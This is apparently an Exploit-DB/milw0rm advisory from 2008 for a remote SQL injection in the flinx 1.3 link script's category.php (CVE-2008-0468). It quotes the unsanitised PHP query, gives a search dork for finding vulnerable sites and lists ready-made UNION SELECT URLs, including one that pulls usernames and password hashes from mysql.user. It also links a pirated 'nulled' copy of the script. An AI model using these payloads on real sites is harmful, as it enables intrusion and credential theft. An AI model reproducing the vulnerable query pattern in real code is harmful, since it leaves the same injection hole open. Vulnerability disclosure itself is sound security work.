flinx <= 1.3 category.php id Remote SQL Injection Vulnerability

2008-01-25T00:00:00
ID EDB-ID:4985
Type exploitdb
Reporter Houssamix
Modified 2008-01-25T00:00:00

Description

flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability. CVE-2008-0468. Webapps exploit for php platform

                                        
                                            --------------------------------------------------------------
            H-T Team [ HouSSaMix + ToXiC350 + RxH ]
--------------------------------------------------------------
# Author : Houssamix From H-T Team
# Script : flinx 1.3 & below                                          
# Download : http://rapidshare.com/files/86100439/flinx.rar.html (Nulled)                         
# BUG :  Remote SQL Injection Vulnerability  
# Dork : Powered by Flinx

## Vulnerable CODE :
~~~~~~~~ category.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&lt;?
$query="SELECT linkID FROM $table_link WHERE relCatID=$id";
$queryl=mysql_query($query);
$count=mysql_numrows($queryl);
$result=mysql_query("SELECT name FROM $table_cat WHERE catID=$id");
if ($row=mysql_fetch_array($result)){
do{
?&gt;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Exploit :
[Target.il]/[flinx_path]/category.php?id=[SQL-CODE]

tables and columns names
=&gt; table :  flinx_cat
columns :  name / catid
=&gt; table : flinx_link
columns :  name  / url / image / relCatID / width / height

exemple :
http://site.com/flinx/category.php?id=-999 union select name from flinx_cat--

we can also try get user and password from mysql.user :
our user needs to be root@localhost or administrator mysql, check:
http://site.com/flinx/category.php?id=-999/**/union/**/select/**/user()/*
user and password from mysql.user:
http://site.com/flinx/category.php?id=concat(user,0x203a3a20,password)/**/from/**/mysql.user/*

# Gr33tz :  CoNaN - V40 - Mahmood_ali - RaChiDoX & all muslims hackers       

# milw0rm.com [2008-01-25]